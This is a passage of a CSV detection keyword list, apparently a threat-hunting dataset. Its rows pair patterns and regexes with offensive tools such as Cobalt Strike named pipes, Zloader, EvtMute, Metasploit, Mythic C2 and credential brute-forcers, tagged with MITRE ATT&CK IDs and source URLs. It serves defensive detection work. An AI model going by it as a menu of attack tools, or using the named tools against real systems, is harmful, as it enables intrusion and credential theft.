Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*ZnVuY3Rpb24gRG9udXQtTG9hZGVyIHtwYXJhbSgkcHJvY2Vzc19pZCwkZG9udXRmaWx*",".{0,1000}ZnVuY3Rpb24gRG9udXQtTG9hZGVyIHtwYXJhbSgkcHJvY2Vzc19pZCwkZG9udXRmaWx.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*ZnVuY3Rpb24gRGxsLUxvYWRlciB7CiAgICBwYXJhbShbc3dpdGNoXSRzbWIsIFtzd2l0Y*",".{0,1000}ZnVuY3Rpb24gRGxsLUxvYWRlciB7CiAgICBwYXJhbShbc3dpdGNoXSRzbWIsIFtzd2l0Y.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*ZnVuY3Rpb24gSW52b2tlLUJpbmFyeSB7cGFyYW0oJGFyZykKICAgICRoZWxwPUAi*",".{0,1000}ZnVuY3Rpb24gSW52b2tlLUJpbmFyeSB7cGFyYW0oJGFyZykKICAgICRoZWxwPUAi.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*zoom1.msi.gpg*",".{0,1000}zoom1\.msi\.gpg.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*zoom2.dll.gpg*",".{0,1000}zoom2\.dll\.gpg.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*zs5460/portscan*",".{0,1000}zs5460\/portscan.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z" "*zsh_executor *",".{0,1000}zsh_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*zsploit-1.txt*",".{0,1000}zsploit\-1\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*zsploit-2.txt*",".{0,1000}zsploit\-2\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ztgrace*changeme*",".{0,1000}ztgrace.{0,1000}changeme.{0,1000}","offensive_tool_keyword","changeme","A default credential scanner.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ztgrace/changeme","1","1","N/A","N/A","10","1404","265","2021-12-26T10:20:11Z","2016-03-11T17:10:34Z" "*ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo*",".{0,1000}ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "*ZXZpZGVuY2UuZmJpLmdvdg==*",".{0,1000}ZXZpZGVuY2UuZmJpLmdvdg\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*zyn3rgy/LdapRelayScan*",".{0,1000}zyn3rgy\/LdapRelayScan.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*zzzteph/weakpass*",".{0,1000}zzzteph\/weakpass.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*Zzzz Zzzzz Zzzz....*",".{0,1000}Zzzz\sZzzzz\sZzzz\.\.\.\..{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "./beef","\.\/beef","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "./CVE-202* -*","\.\/CVE\-20.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","POC","CVE POC execution","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce","1","0","N/A","N/A","1","38","14","2022-04-01T08:44:19Z","2022-04-01T07:55:26Z" "./radare *","\.\/radare\s.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","351","52","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" "/adhunt.py","\/adhunt\.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "\\demoagent_11","\\\\demoagent_11","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\demoagent_22","\\\\demoagent_22","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\DserNamePipe*","\\\\DserNamePipe.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\f4c3*","\\\\f4c3.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\f53f*","\\\\f53f.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\fullduplex_*","\\\\fullduplex_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\interprocess_*","\\\\interprocess_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\lsarpc_*","\\\\lsarpc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\mojo_*","\\\\mojo_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\msagent_*","\\\\msagent_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\MsFteWds*","\\\\MsFteWds.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\msrpc_*","\\\\msrpc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\MSSE-*","\\\\MSSE\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\mypipe-*","\\\\mypipe\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 